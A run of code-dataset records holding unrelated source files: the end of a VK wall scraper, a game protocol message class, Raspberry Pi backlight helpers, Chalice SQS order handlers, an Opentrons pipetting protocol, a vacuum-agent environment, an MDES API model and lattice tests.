city['response'][0]['name']\n print(city)\n return city\n\n\ndef good_bd(bdate):\n dots = re.findall(r'\\.', bdate)\n if len(dots) == 2:\n years = str(2017 - int(bdate[-4:]))\n print(years)\n return years\n else:\n print('no year of bd')\n return '-'\n\n \ndef dump(text, name):\n f = open(name+'.json', 'w', encoding='utf-8')\n json.dump(text, f, indent = 2, ensure_ascii = False)\n f.close()\n\n\ndef posts_to_tsv(posts):\n i = 0\n for key, info in posts.items():\n if i == 0:\n f = open('posts.tsv', 'w', encoding='utf-8')\n i += 1\n else:\n f = open('posts.tsv', 'a', encoding='utf-8')\n text = str(key)+'\\t'+str(info['words'])+'\\t'+str(info['likes'])+'\\n'\n f.write(text)\n\n\ndef comments_to_tsv(comms):\n i = 0\n for key, info in comms.items():\n if i == 0:\n f = open('comments.tsv', 'w', encoding='utf-8')\n i += 1\n else:\n f = open('comments.tsv', 'a', encoding='utf-8')\n text = str(key)+'\\t'+str(info['words'])+'\\t'+str(info['likes'])\\\n +'\\t'+info['from_who']['bdate']+'\\t'+info['from_who']['city']+'\\n'\n f.write(text)\n\n\nif __name__ == '__main__':\n info = get_wall('-53845179')\n dump(info[0], 'posts_che')\n dump(info[1], 'comments_che')\n posts_to_tsv(info[0])\n comments_to_tsv(info[1])\n","sub_path":"hw_4/che_load.py","file_name":"che_load.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"524934433","text":"from module.protocol.network.messages.NetworkMessage import NetworkMessage\n\n\nclass IconPresetSaveRequestMessage(NetworkMessage):\n def __init__(self, buffer_reader, len_type, length, count=None):\n NetworkMessage.__init__(self, buffer_reader, len_type, length, count)\n self.id = 6308\n self.presetId = {\"type\": \"int\", \"value\": \"\"}\n self.symbolId = {\"type\": \"uint\", \"value\": \"\"}\n self.updateData = {\"type\": \"Boolean\", \"value\": \"\"}\n","sub_path":"module/protocol/network/messages/IconPresetSaveRequestMessage.py","file_name":"IconPresetSaveRequestMessage.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41555029","text":"# Collectin of Raspberry Pi related helper functions for interacting with screen\n# brightness.\n\nimport tempfile\nimport logging\nimport inspect\n\n\nHIGH_BRIGHTNESS = 255\nBRIGHTNESS_FILE = \"/sys/class/backlight/rpi_backlight/brightness\"\nPOWER_FILE = \"/sys/class/backlight/rpi_backlight/bl_power\"\n\nlogger = logging.getLogger(\"eventLogger\")\n\n\ndef set_display_backlight_brightness(brightness):\n \"\"\"Write a new brightness value to file.\"\"\"\n with _open_config_file_or_tempfile(BRIGHTNESS_FILE, \"w\") as f:\n f.write(str(brightness))\n\ndef toggle_display_backlight_brightness(low_brightness=12):\n \"\"\"Reads Raspberry pi touch display's current brightness values from system\n file and toggles it between low and max (255) values depending on the\n current value.\n \"\"\"\n old = _get_current_display_backlight_brightness()\n\n # set to furthest away from current brightness\n if abs(old-low_brightness) < abs(old-HIGH_BRIGHTNESS):\n new = HIGH_BRIGHTNESS\n else:\n new = low_brightness\n\n set_display_backlight_brightness(new)\n\ndef toggle_screen_state(state=\"on\"):\n \"\"\"Toggle screen state between on / off.\"\"\"\n value = 1\n if state == \"on\":\n value = 0\n\n with _open_config_file_or_tempfile(POWER_FILE, \"w\") as f:\n f.write(str(value))\n\ndef screen_is_powered():\n \"\"\"Determine whether the screen backlight is 
currently on.\"\"\"\n with _open_config_file_or_tempfile(POWER_FILE) as f:\n value = f.read().strip()\n\n return value == \"0\"\n\ndef get_and_set_screen_state(new_state):\n \"\"\"Read the current screen power state and set it to new_state. Returns the\n previous value ('on'/'off').\n \"\"\"\n with _open_config_file_or_tempfile(POWER_FILE, \"r+\") as f:\n previous_value = f.read().strip()\n\n f.seek(0)\n value = 1\n if new_state == \"on\":\n value = 0\n f.write(str(value))\n\n if previous_value == 0:\n return \"on\"\n return \"off\"\n\ndef _get_current_display_backlight_brightness():\n \"\"\"Return the current backlight brightness value.\"\"\"\n with _open_config_file_or_tempfile(BRIGHTNESS_FILE, \"r\") as f:\n try:\n value = int(f.read().strip())\n except ValueError:\n value = HIGH_BRIGHTNESS # default to max value if unable to read the file (ie. is a dummy tempfile)\n\n return value\n\ndef _open_config_file_or_tempfile(file_path, mode=\"r\"):\n \"\"\"Return a file object matching a file path. Returns either a\n file object pointing to an existing file or a TemporaryFile if the file\n does not exist.\n \"\"\"\n try:\n return open(file_path, mode=mode)\n except FileNotFoundError:\n stack_value = inspect.stack()[1]\n function = stack_value.function\n argvalues = inspect.getargvalues(stack_value.frame)\n\n logger.warning(\n \"Using tempfile instead of non-existing file %s when calling %s with arguments: %s\",\n file_path,\n function,\n inspect.formatargvalues(*argvalues)\n )\n return tempfile.TemporaryFile(mode=mode)\n except PermissionError as e:\n logging.warning(\"Couldn't open file %s, using tempfile. Original error was\\n%s\", file_path, str(e))\n return tempfile.TemporaryFile(mode=mode)\n","sub_path":"src/rpi_utils.py","file_name":"rpi_utils.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"148126554","text":"my_netflix_favs = [\n 'Stranger Things', 'House of Cards', 'Orange is the new black',\n 'Jessica Jones', 'Narcos', 'Por trece razones'\n]\n\nwhile True:\n target_serie = input('Introduzca la serie que quiere buscar: ')\n if target_serie == ':wq':\n break\n if target_serie in my_netflix_favs:\n pos = my_netflix_favs.index(target_serie)\n print(f'La serie indicada ocupa la posición {pos}')\n else:\n my_netflix_favs.append(target_serie)\n print('Serie añadida a sus Netflix-favs')\n","sub_path":"solutions/data_structures/find_series.py","file_name":"find_series.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"247875821","text":"import uuid\nfrom chalicelib.extensions import *\nfrom chalicelib.utils.sqs_handlers.base import *\nfrom chalicelib.libs.core.sqs_sender import SqsSenderEventInterface, SqsSenderImplementation\nfrom chalicelib.libs.core.logger import Logger\nfrom chalicelib.libs.purchase.core import SimpleSku, Qty, Order\nfrom chalicelib.libs.purchase.order.storage import OrderStorageImplementation\nfrom chalicelib.libs.purchase.customer.storage import CustomerStorageImplementation\nfrom chalicelib.libs.purchase.product.storage import ProductStorageImplementation\nfrom chalicelib.libs.message.base import Message, MessageStorageImplementation\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass OrderChangeSqsSenderEvent(SqsSenderEventInterface):\n @classmethod\n def _get_event_type(cls) -> str:\n 
return 'order_change'\n\n def __init__(self, order: Order):\n if not isinstance(order, Order):\n raise ArgumentTypeException(self.__init__, 'order', order)\n\n self.__order = order\n\n @property\n def event_data(self) -> dict:\n return {\n 'order_number': self.__order.number.value,\n }\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass OrderChangeSqsHandler(SqsHandlerInterface):\n def __init__(self):\n self.__messages_storage = MessageStorageImplementation()\n self.__order_storage = OrderStorageImplementation()\n self.__sqs_sender = SqsSenderImplementation()\n self.__logger = Logger()\n\n def handle(self, sqs_message: SqsMessage) -> None:\n def __log_flow(text: str) -> None:\n self.__logger.log_simple('{} : SQS Message #{} : {}'.format(\n self.__class__.__qualname__,\n sqs_message.id,\n text\n ))\n\n __log_flow('Start - {}'.format(sqs_message.message_data))\n\n data = {\n 'order_number': sqs_message.message_data.get('order_number', '') or '',\n 'order_status_mpc': sqs_message.message_data.get('order_status_mpc', '') or '',\n 'popup_message': {\n 'customer_email': sqs_message.message_data.get('popup_message').get('customer_email'),\n 'message_title': sqs_message.message_data.get('popup_message').get('message_title'),\n 'message_text': sqs_message.message_data.get('popup_message').get('message_text'),\n } if sqs_message.message_data.get('popup_message', None) or None else None,\n }\n\n __log_flow('Order: Updating...')\n order_number = Order.Number(data.get('order_number'))\n order = self.__order_storage.load(order_number)\n if not order:\n raise ValueError('Order \"{}\" does not exist in the MPC!'.format(order_number.value))\n\n mpc_order_status = str(data.get('order_status_mpc'))\n order.status = Order.Status(mpc_order_status)\n __log_flow('Order: Updated!')\n\n __log_flow('Order: Saving...')\n self.__order_storage.save(order)\n __log_flow('Order: Saved!')\n\n # Attention!\n # We need to send back order changes for compatibility reasons.\n __log_flow('Order: SQS Sending-Back...')\n self.__sqs_sender.send(OrderChangeSqsSenderEvent(order))\n __log_flow('Order: SQS Sent-Back!')\n\n # add message, if needed (silently)\n try:\n message_data = data.get('popup_message') or None\n if message_data:\n __log_flow('Notification popup: Adding...')\n message = Message(\n str(uuid.uuid4()),\n message_data.get('customer_email'),\n message_data.get('message_title'),\n message_data.get('message_text'),\n )\n self.__messages_storage.save(message)\n __log_flow('Notification popup: Added!')\n except BaseException as e:\n self.__logger.log_exception(e)\n __log_flow('Notification popup: Not Added because of Error : {}'.format(str(e)))\n\n __log_flow('End')\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass OrderRefundSqsHandler(SqsHandlerInterface):\n def __init__(self) -> None:\n self.__messages_storage = MessageStorageImplementation()\n self.__order_storage = OrderStorageImplementation()\n self.__customer_storage = CustomerStorageImplementation()\n self.__product_storage = ProductStorageImplementation()\n self.__sqs_sender = SqsSenderImplementation()\n self.__logger = Logger()\n\n def handle(self, sqs_message: SqsMessage) -> None:\n def __log_flow(text: str) -> None:\n self.__logger.log_simple('{} : SQS Message #{} : {}'.format(\n self.__class__.__qualname__,\n sqs_message.id,\n text\n ))\n\n __log_flow('Start - {}'.format(sqs_message.message_data))\n\n 
order_number = Order.Number(sqs_message.message_data['order_number'])\n simple_sku = SimpleSku(sqs_message.message_data['simple_sku'])\n qty = Qty(sqs_message.message_data['qty'])\n\n __log_flow('Order Updating...')\n order = self.__order_storage.load(order_number)\n order.refund(simple_sku, qty)\n __log_flow('Order Updated!')\n\n __log_flow('Order Saving...')\n self.__order_storage.save(order)\n __log_flow('Order Saved!')\n\n __log_flow('Order SQS Sending...')\n self.__sqs_sender.send(OrderChangeSqsSenderEvent(order))\n __log_flow('Order SQS Sent!')\n\n # add message (silently)\n try:\n __log_flow('Notification popup: Adding...')\n customer = self.__customer_storage.get_by_id(order.customer_id)\n product = self.__product_storage.load(simple_sku)\n message = Message(\n str(uuid.uuid4()),\n customer.email.value,\n 'Refund for Order #{}'.format(order.number.value),\n '\"{}\" has been Refunded in Qty {} for Order #{}'.format(\n product.name.value,\n qty.value,\n order.number.value\n ),\n )\n self.__messages_storage.save(message)\n __log_flow('Notification popup: Added!')\n except BaseException as e:\n self.__logger.log_exception(e)\n __log_flow('Notification popup: Not Added because of Error : {}'.format(str(e)))\n\n __log_flow('End')\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n\nclass OrderPaymentOhHoldHandler(SqsHandlerInterface):\n def __init__(self):\n self.__order_storage = OrderStorageImplementation()\n self.__sqs_sender = SqsSenderImplementation()\n self.__logger = Logger()\n self.__message_storage = MessageStorageImplementation()\n self.__customer_storage = CustomerStorageImplementation()\n self.__products_storage = ProductStorageImplementation()\n\n def handle(self, sqs_message: SqsMessage) -> None:\n def __log_flow(text: str) -> None:\n self.__logger.log_simple('{} : SQS Message #{} : {}'.format(\n self.__class__.__qualname__,\n sqs_message.id,\n text\n ))\n\n __log_flow('Start : {}'.format(sqs_message.message_data))\n\n if sqs_message.message_type != 'fixel_order_on_hold_by_portal':\n raise ValueError('{} does not know how to handle {} sqs message! 
Message data: {}'.format(\n                self.__class__.__qualname__,\n                sqs_message.message_type,\n                sqs_message.message_data\n            ))\n\n        order_number_value = sqs_message.message_data.get('order_number')\n        on_hold_status = sqs_message.message_data.get('status')\n\n        order_number = Order.Number(order_number_value)\n        order = self.__order_storage.load(order_number)\n\n        if on_hold_status == Order.Status.CLOSED:\n            self.__close_order_on_hold(order, __log_flow)\n        else:\n            self.__on_hold_not_closed_status(order, on_hold_status, __log_flow)\n\n        self.__send_order_change_to_portal(order, __log_flow)\n        self.__notify_about_order_status_change_silently(order, __log_flow)\n\n        __log_flow('End')\n\n    def __on_hold_not_closed_status(self, order: Order, on_hold_status: str, __log_flow) -> None:\n        __log_flow('Order Updating...')\n        order.status = Order.Status(on_hold_status)\n        __log_flow('Order Updated!')\n\n        __log_flow('Order Saving...')\n        self.__order_storage.save(order)\n        __log_flow('Order Saved!')\n\n    def __close_order_on_hold(self, order: Order, __log_flow) -> None:\n        __log_flow('Updating...')\n\n        # close order\n        __log_flow('Order Updating...')\n        order.status = Order.Status(Order.Status.CLOSED)\n        __log_flow('Order Updated!')\n\n        # restore products qty\n        __log_flow('Product Qty Updating - Start')\n        products_to_save = []\n        for order_item in order.items:\n            if order_item.qty_processable.value == 0:\n                __log_flow('Product Qty Updating: {} skipped because of 0 qty'.format(order_item.simple_sku.value))\n                continue\n\n            __log_flow('Product Qty Updating {} / {} ...'.format(\n                order_item.simple_sku.value,\n                order_item.qty_processable.value\n            ))\n\n            product = self.__products_storage.load(order_item.simple_sku)\n            product.restore_qty(order_item.qty_processable)\n            products_to_save.append(product)\n\n            __log_flow('Product Qty Updated {} / {}!'.format(\n                order_item.simple_sku.value,\n                order_item.qty_processable.value\n            ))\n\n        __log_flow('Product Qty Updating - End')\n\n        __log_flow('Updated!')\n\n        __log_flow('Saving...')\n\n        __log_flow('Order Saving...')\n        self.__order_storage.save(order)\n        __log_flow('Order Saved!')\n\n        __log_flow('Products Saving...')\n        for product in products_to_save:\n            __log_flow('Product {} Saving...'.format(product.simple_sku.value))\n            self.__products_storage.update(product)\n            __log_flow('Product {} Saved!'.format(product.simple_sku.value))\n        __log_flow('Products Saved!')\n\n        __log_flow('Saved!')\n\n    def __send_order_change_to_portal(self, order: Order, __log_flow) -> None:\n        __log_flow('Order SQS: Sending...')\n        self.__sqs_sender.send(OrderChangeSqsSenderEvent(order))\n        __log_flow('Order SQS: Sent!')\n\n    def __notify_about_order_status_change_silently(self, order: Order, __log_flow) -> None:\n        try:\n            __log_flow('Notification popup: Adding...')\n            customer = self.__customer_storage.get_by_id(order.customer_id)\n            self.__message_storage.save(Message(\n                str(uuid.uuid4()),\n                customer.email.value,\n                # the title placeholder was left unformatted in the original\n                'Order #{} status is changed!'.format(order.number.value),\n                'Order #{} has been changed to \"{}\" status!'.format(order.number.value, order.status.label)\n            ))\n            __log_flow('Notification popup: Added!')\n        except BaseException as e:\n            self.__logger.log_exception(e)\n            __log_flow('Notification popup: Not Added because of Error : {}'.format(str(e)))\n\n\n# 
----------------------------------------------------------------------------------------------------------------------\n\n","sub_path":"chalicelib/libs/purchase/order/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":11627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466411052","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 8 00:00:17 2016\n@author: MPE\n\"\"\"\nfrom sense_hat import SenseHat\nsense=SenseHat()\n\nHumedad=sense.get_humidity()\nTemp1=sense.get_temperature_from_humidity()\nTemp2=sense.get_temperature_from_pressure()\nPresion=sense.get_pressure()\nprint(\"Humedad: %2.3f\" %Humedad)\nprint(\"Temperaturas: %2.3f %2.3f\" % (Temp1,Temp2))\nprint(\"Presión: %4.2f\" %Presion)\n\nTStr=str(round(Temp1,2))\nsense.show_message(\"T:\"+TStr)","sub_path":"prueba_sensores.py","file_name":"prueba_sensores.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"492387920","text":"metadata = {\n 'protocolName': 'Adding Developer Solution to 216 Well Cartridge Plate',\n 'author': 'Rami Farawi ',\n 'source': 'Custom Protocol Request',\n 'apiLevel': '2.9'\n}\n\n\ndef run(ctx):\n\n [height_above_cartridge,\n disp_vol, disp_rate, p300_mount] = get_values( # noqa: F821\n \"height_above_cartridge\", \"disp_vol\", \"disp_rate\", \"p300_mount\")\n\n if not 0.1 <= height_above_cartridge <= 10:\n raise Exception(\"Enter a height between 1 and 10mm\")\n if not 1 <= disp_vol <= 85:\n raise Exception(\"Enter a dispense volume between 1 and 85µL\")\n\n # load labware\n plate = ctx.load_labware('invoy_216_well_cartridge_plate', '1')\n reservoir = ctx.load_labware('nest_1_reservoir_195ml', '6')\n tiprack = ctx.load_labware('opentrons_96_tiprack_300ul', '9')\n\n # load instruments\n p300 = ctx.load_instrument('p300_single_gen2', p300_mount,\n tip_racks=[tiprack])\n\n # protocol\n p300.flow_rate.dispense = disp_rate\n chunks = [plate.wells()[i:i+3] for i in range(0, len(plate.wells()), 3)]\n p300.pick_up_tip()\n for chunk in chunks:\n p300.distribute(disp_vol, reservoir.wells()[0],\n [well.top(height_above_cartridge)\n for well in chunk],\n new_tip='never',\n blow_out=True,\n blowout_location='source well')\n p300.drop_tip()\n","sub_path":"protocols/7f0f89/7f0f89.ot2.apiv2.py","file_name":"7f0f89.ot2.apiv2.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"157916670","text":"'''\nCPSC 415 -- Homework #1 support file\nStephen Davies, University of Mary Washington, fall 2017\nBased somewhat on AIMA's git@github.com:aimacode/aima-python.git agents.py.\n'''\n\nimport logging\nimport sys\nimport random\n\nfrom agent import *\nfrom environment import *\n\n\n\nclass VacuumAgent(Agent):\n image_filename = 'cleaner.gif'\n possible_actions = ['Right', 'Left', 'Up', 'Down', 'Suck', 'NoOp']\n def __init__(self):\n super().__init__()\n self._bump = False\n\n\nclass VacuumEnvironment(XYEnvironment):\n\n \"\"\"The environment of [Ex. 2.12]. 
Agent perceives dirty or clean, and bump\n (into obstacle) or not; 2D discrete world of unknown size; performance\n measure is 50 for each square of dirt cleaned, -2 for each 'suck' action,\n and -1 for each move action.\"\"\"\n\n def __init__(self, width=10, height=10):\n super().__init__(width, height)\n self.add_walls()\n\n def thing_classes(self):\n return [Wall, Dirt, ReflexVacuumAgent, RandomVacuumAgent,\n TableDrivenVacuumAgent, ModelBasedVacuumAgent]\n\n def percept(self, agent):\n \"\"\"The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').\n Unlike the TrivialVacuumEnvironment, location is NOT perceived.\"\"\"\n status = ('Dirty' if self.some_things_at(\n self[agent], Dirt) else 'Clean')\n bump = ('Bump' if agent._bump else 'None')\n return (status, bump)\n\n def execute_action(self, agent, action):\n if action not in agent.possible_actions:\n print(\"Illegal action {}! Shutting down.\".format(action))\n sys.exit(1)\n if action == 'Suck':\n agent.performance -= 2\n dirt_list = self.list_things_at(self[agent], Dirt)\n if dirt_list != []:\n dirt = dirt_list[0]\n agent.performance += 50\n self.delete_thing(dirt)\n else:\n super().execute_action(agent, action)\n\n if action in {'Left','Right','Up','Down'}:\n agent.performance -= 1\n\n def is_clean(self):\n return all([ type(thing) is not Dirt for thing in self ])\n\n def should_shutdown(self):\n return self.is_clean()\n\n def add_to_random_empty_square(self, thing):\n possible_squares = [(x,y) for x in range(self.width) \n for y in range(self.height) if (x,y) not in self.values()]\n self.add_thing(thing,random.choice(possible_squares))\n \n\nclass DirtyVacuumEnvironment(VacuumEnvironment):\n\n def __init__(self, width=10, height=10, dirt_prob=.5):\n super().__init__(width, height)\n self.width=width\n self.height=height\n self.dirt_prob=dirt_prob\n self._scatter_dirt()\n\n def _scatter_object(self, cls, prob=.5):\n '''Randomly put down an object of the class passed on every empty \n square, with probability passed.'''\n possible_squares = [(x,y) for x in range(self.width) \n for y in range(self.height) if (x,y) not in self.values()]\n for sq in possible_squares:\n if random.random() < prob:\n self.add_thing(cls(), sq)\n\n def _scatter_dirt(self):\n self._scatter_object(Dirt, self.dirt_prob)\n\n\nclass RandomDirtyVacuumEnvironment(DirtyVacuumEnvironment):\n\n def __init__(self, width_range=(10,20), height_range=(10,20)):\n super().__init__(\n random.randint(*width_range), random.randint(*height_range))\n self._add_walls()\n\n def _add_walls(self):\n self._scatter_object(Wall, .2)\n\n\n\nclass Dirt(Thing):\n image_filename = 'dirt.gif'\n","sub_path":"vacuum.py","file_name":"vacuum.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"127726571","text":"# coding: utf-8\n\n\"\"\"\n MDES for Merchants\n\n The MDES APIs are designed as RPC style stateless web services where each API endpoint represents an operation to be performed. All request and response payloads are sent in the JSON (JavaScript Object Notation) data-interchange format. Each endpoint in the API specifies the HTTP Method used to access it. All strings in request and response objects are to be UTF-8 encoded. Each API URI includes the major and minor version of API that it conforms to. This will allow multiple concurrent versions of the API to be deployed simultaneously. 
# noqa: E501\n\n The version of the OpenAPI document: 1.2.7\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass TokenDetailData(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'token_number': 'str',\n 'expiry_month': 'str',\n 'expiry_year': 'str',\n 'data_valid_until_timestamp': 'str',\n 'payment_account_reference': 'str'\n }\n\n attribute_map = {\n 'token_number': 'tokenNumber',\n 'expiry_month': 'expiryMonth',\n 'expiry_year': 'expiryYear',\n 'data_valid_until_timestamp': 'dataValidUntilTimestamp',\n 'payment_account_reference': 'paymentAccountReference'\n }\n\n def __init__(self, token_number=None, expiry_month=None, expiry_year=None, data_valid_until_timestamp=None, payment_account_reference=None): # noqa: E501\n \"\"\"TokenDetailData - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._token_number = None\n self._expiry_month = None\n self._expiry_year = None\n self._data_valid_until_timestamp = None\n self._payment_account_reference = None\n self.discriminator = None\n\n if token_number is not None:\n self.token_number = token_number\n if expiry_month is not None:\n self.expiry_month = expiry_month\n if expiry_year is not None:\n self.expiry_year = expiry_year\n if data_valid_until_timestamp is not None:\n self.data_valid_until_timestamp = data_valid_until_timestamp\n if payment_account_reference is not None:\n self.payment_account_reference = payment_account_reference\n\n @property\n def token_number(self):\n \"\"\"Gets the token_number of this TokenDetailData. # noqa: E501\n\n Globally unique identifier for the Token, as assigned by MDES. __Max Length:64__ # noqa: E501\n\n :return: The token_number of this TokenDetailData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._token_number\n\n @token_number.setter\n def token_number(self, token_number):\n \"\"\"Sets the token_number of this TokenDetailData.\n\n Globally unique identifier for the Token, as assigned by MDES. __Max Length:64__ # noqa: E501\n\n :param token_number: The token_number of this TokenDetailData. # noqa: E501\n :type: str\n \"\"\"\n\n self._token_number = token_number\n\n @property\n def expiry_month(self):\n \"\"\"Gets the expiry_month of this TokenDetailData. # noqa: E501\n\n The expiry month for the account. # noqa: E501\n\n :return: The expiry_month of this TokenDetailData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._expiry_month\n\n @expiry_month.setter\n def expiry_month(self, expiry_month):\n \"\"\"Sets the expiry_month of this TokenDetailData.\n\n The expiry month for the account. # noqa: E501\n\n :param expiry_month: The expiry_month of this TokenDetailData. # noqa: E501\n :type: str\n \"\"\"\n\n self._expiry_month = expiry_month\n\n @property\n def expiry_year(self):\n \"\"\"Gets the expiry_year of this TokenDetailData. # noqa: E501\n\n The expiry year for the account. # noqa: E501\n\n :return: The expiry_year of this TokenDetailData. # noqa: E501\n :rtype: str\n \"\"\"\n return self._expiry_year\n\n @expiry_year.setter\n def expiry_year(self, expiry_year):\n \"\"\"Sets the expiry_year of this TokenDetailData.\n\n The expiry year for the account. 
# noqa: E501\n\n        :param expiry_year: The expiry_year of this TokenDetailData. # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._expiry_year = expiry_year\n\n    @property\n    def data_valid_until_timestamp(self):\n        \"\"\"Gets the data_valid_until_timestamp of this TokenDetailData. # noqa: E501\n\n        \\\"The date/time after which this CardInfoData object is considered invalid. If present, all systems must reject this CardInfoData object after this time and treat it as invalid data. Must be expressed in ISO 8601 extended format as one of the following: YYYY-MM-DDThh:mm:ss[.sss]Z YYYY-MM-DDThh:mm:ss[.sss]±hh:mm Where [.sss] is optional and can be 1 to 3 digits. Must be a value no more than 30 days in the future. MasterCard recommends using a value of (Current Time + 30 minutes).\\\" # noqa: E501\n\n        :return: The data_valid_until_timestamp of this TokenDetailData. # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._data_valid_until_timestamp\n\n    @data_valid_until_timestamp.setter\n    def data_valid_until_timestamp(self, data_valid_until_timestamp):\n        \"\"\"Sets the data_valid_until_timestamp of this TokenDetailData.\n\n        \\\"The date/time after which this CardInfoData object is considered invalid. If present, all systems must reject this CardInfoData object after this time and treat it as invalid data. Must be expressed in ISO 8601 extended format as one of the following: YYYY-MM-DDThh:mm:ss[.sss]Z YYYY-MM-DDThh:mm:ss[.sss]±hh:mm Where [.sss] is optional and can be 1 to 3 digits. Must be a value no more than 30 days in the future. MasterCard recommends using a value of (Current Time + 30 minutes).\\\" # noqa: E501\n\n        :param data_valid_until_timestamp: The data_valid_until_timestamp of this TokenDetailData. # noqa: E501\n        :type: str\n        \"\"\"\n\n        self._data_valid_until_timestamp = data_valid_until_timestamp\n\n    @property\n    def payment_account_reference(self):\n        \"\"\"Gets the payment_account_reference of this TokenDetailData. # noqa: E501\n\n        \\\"The unique account reference assigned to the PAN. Conditionally returned if the Token Requestor has opted to receive PAR and providing PAR is assigned by Mastercard or the Issuer provides PAR in the authorization message response. __Max Length:__ - 29\\\" # noqa: E501\n\n        :return: The payment_account_reference of this TokenDetailData. # noqa: E501\n        :rtype: str\n        \"\"\"\n        return self._payment_account_reference\n\n    @payment_account_reference.setter\n    def payment_account_reference(self, payment_account_reference):\n        \"\"\"Sets the payment_account_reference of this TokenDetailData.\n\n        \\\"The unique account reference assigned to the PAN. Conditionally returned if the Token Requestor has opted to receive PAR and providing PAR is assigned by Mastercard or the Issuer provides PAR in the authorization message response. __Max Length:__ - 29\\\" # noqa: E501\n\n        :param payment_account_reference: The payment_account_reference of this TokenDetailData. 
# noqa: E501\n :type: str\n \"\"\"\n\n self._payment_account_reference = payment_account_reference\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, TokenDetailData):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"rest_client_python/openapi_client/models/token_detail_data.py","file_name":"token_detail_data.py","file_ext":"py","file_size_in_byte":9079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"198517268","text":"\"\"\"\nTests for dit.algorithms.lattice\n\"\"\"\n\nfrom __future__ import division\n\nfrom iterutils import powerset\n\nfrom nose.tools import assert_equal, assert_raises\n\nimport numpy as np\nimport numpy.testing as npt\n\nfrom dit import Distribution, ScalarDistribution\nfrom dit.algorithms.lattice import (dist_from_induced_sigalg, insert_join,\n join, join_sigalg, meet, meet_sigalg,\n sigma_algebra_sort)\n\ndef test_sigalg_sort():\n \"\"\" Test sigma_algebra_sort \"\"\"\n sigalg = frozenset([\n frozenset([]),\n frozenset([1]),\n frozenset([2]),\n frozenset([1, 2])\n ])\n sigalg_ = [(), (1,), (2,), (1, 2)]\n assert_equal(sigalg_, sigma_algebra_sort(sigalg))\n\ndef test_join_sigalg():\n \"\"\" Test join_sigalg \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n sigalg = frozenset([frozenset(_) for _ in powerset(outcomes)])\n joined = join_sigalg(d, [[0], [1]])\n assert_equal(sigalg, joined)\n\ndef test_meet_sigalg():\n \"\"\" Test meet_sigalg \"\"\"\n outcomes = ['00', '01', '10', '11']\n pmf = [1/4]*4\n d = Distribution(outcomes, pmf)\n sigalg = frozenset([frozenset([]), frozenset(outcomes)])\n meeted = meet_sigalg(d, [[0], [1]])\n assert_equal(sigalg, meeted)\n\ndef test_dist_from_induced():\n \"\"\" Test dist_from_induced_sigalg \"\"\"\n outcomes = [(0,), (1,), (2,)]\n pmf = np.array([1/3] * 3)\n d = ScalarDistribution(outcomes, pmf)\n\n sigalg = frozenset(map(frozenset, d.event_space()))\n d2 = dist_from_induced_sigalg(d, sigalg)\n npt.assert_allclose(pmf, d2.pmf)\n\n sigalg = [(), ((0,),), ((1,), (2,)), ((0,), (1,), (2,))]\n sigalg = frozenset(map(frozenset, sigalg))\n d2 = dist_from_induced_sigalg(d, sigalg, int_outcomes=True)\n pmf = np.array([1/3, 2/3])\n npt.assert_allclose(pmf, d2.pmf)\n\n d2 = dist_from_induced_sigalg(d, sigalg, int_outcomes=False)\n outcomes = (((0,),), ((1,), (2,)))\n assert_equal(outcomes, 